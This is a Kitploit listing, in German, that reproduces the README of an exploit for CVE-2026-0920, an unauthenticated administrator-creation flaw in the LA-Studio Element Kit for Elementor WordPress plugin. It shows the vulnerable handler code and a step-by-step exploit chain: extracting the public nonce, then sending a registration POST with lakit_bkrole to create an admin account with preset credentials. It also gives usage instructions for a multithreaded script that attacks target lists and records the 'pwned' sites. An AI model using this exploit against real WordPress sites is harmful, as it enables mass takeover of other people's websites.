Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-0920- — - LA-Studio Element Kit for Elementor <= 1.5.6.3 - Nicht authentifizierte Rechteausweitung über eine Backdoor zur Erstellung von Administratorkonten über den Parameter lakit_bkrole | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-0920-
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitLernen & Bildung
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

- LA-Studio Element Kit for Elementor <= 1.5.6.3 - Nicht authentifizierte Rechteausweitung über eine Backdoor zur Erstellung von Administratorkonten über den Parameter lakit_bkrole

Repository anzeigen
217vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-0920-

LA-Studio Element Kit für Elementor <= 1.5.6.3 - Nicht authentifizierte Privilegienerweiterung per Backdoor zur Erstellung von Administratorkonten über den Parameter lakit_bkrole

   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 Der Exploit erscheint hier zuerst. Folge @KNxploited auf Telegram — dein Elite-Feed für frisch veröffentlichte CVEs, funktionierende PoCs und präzise Sicherheitsforschung. Unermüdlich aktualisiert. Entwickelt für alle, die immer einen Schritt voraus sind.


🧠 Übersicht

CVE-2026-0920 ist eine kritische CVSS-9.8-Schwachstelle, die im LA-Studio Element Kit for Elementor WordPress-Plugin entdeckt wurde.

Die Schwachstelle liegt in der Funktion ajax_register_handle(), die nicht authentifizierte Benutzerregistrierungen über AJAX verarbeitet. Die Funktion erzwingt keinerlei Einschränkung des Parameters lakit_bkrole – wodurch ein vollständig nicht authentifizierter Angreifer sich bei der Registrierung selbst die Rolle administrator zuweisen kann und mit einer einzigen Anfrage die vollständige Übernahme der WordPress-Administration erreicht.

FeldDetails
CVE-IDCVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Betroffene VersionenAlle Versionen bis einschließlich 1.5.6.3
SchwachstellentypNicht authentifizierte Privilegienerweiterung / Admin-Erstellung
AngriffsvektorNetzwerk — keine Authentifizierung erforderlich
CVSS-3.1-Score9.8 KRITISCH
CVSS-VektorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
AuswirkungVollständige Übernahme der WordPress-Administration
ForscherNxploited

💀 Detaillierte Schwachstellenanalyse

Die Grundursache ist eine fehlende Rollen-Berechtigungsprüfung im AJAX-Registrierungshandler des Plugins:

// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Warum das kritisch ist:

  • wp_ajax_nopriv_* = für jeden ohne jegliche Authentifizierung zugänglich
  • lakit_bkrole akzeptiert jede WordPress-Rollenzeichenfolge – einschließlich administrator
  • Eine einzige POST-Anfrage erstellt ein vollständig privilegiertes Administratorkonto
  • Das erforderliche Nonce wird öffentlich im Frontend-HTML/JS der Website offengelegt
  • Kein Rate-Limiting, standardmäßig keine CAPTCHA-Erzwingung, keine E-Mail-Verifizierung erforderlich

⚔️ Exploit-Kette

Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Voraussetzungen

pip install requests colorama
AbhängigkeitZweck
requestsHTTP-Anfragen, Sitzungsverwaltung, Cookie-Verwaltung
coloramaFarbige Terminalausgabe auf allen Plattformen
threadingParallele Verarbeitung mehrerer Ziele
reRegex-basierte Nonce-Extraktion aus HTML/JS

Python 3.10+ wird empfohlen (verwendet str | None-Union-Typ-Hinweise).


📂 Dateistruktur

CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Verwendung

Schritt 1 — Anmeldedaten konfigurieren (Optional)

Öffne CVE-2026-0920.py und bearbeite die Konstanten am Anfang der Datei, um die gewünschten Admin-Kontodaten festzulegen:

ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Schritt 2 — Ziele vorbereiten

Erstelle list.txt mit einer Ziel-URL pro Zeile:

https://target1.com
https://target2.com
http://target3.com

URLs ohne Schema werden automatisch mit https:// ergänzt.


Schritt 3 — Den Exploit ausführen

python CVE-2026-0920.py

Du wirst aufgefordert:

Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

Schritt 4 — Live-Ausgabe überwachen

Tool herunterladen